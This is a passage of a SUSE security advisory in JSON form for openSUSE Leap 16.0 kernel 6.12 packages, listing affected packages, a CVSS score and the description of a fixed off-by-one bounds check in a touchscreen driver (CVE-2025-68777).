"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-68776"
},
{
"cve": "CVE-2025-68777",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68777"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nInput: ti_am335x_tsc - fix off-by-one error in wire_order validation\n\nThe current validation \u0027wire_order[i] \u003e ARRAY_SIZE(config_pins)\u0027 allows\nwire_order[i] to equal ARRAY_SIZE(config_pins), which causes out-of-bounds\naccess when used as index in \u0027config_pins[wire_order[i]]\u0027.\n\nSince config_pins has 4 elements (indices 0-3), the valid range for\nwire_order should be 0-3. Fix the off-by-one error by using \u003e= instead\nof \u003e in the validation check.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
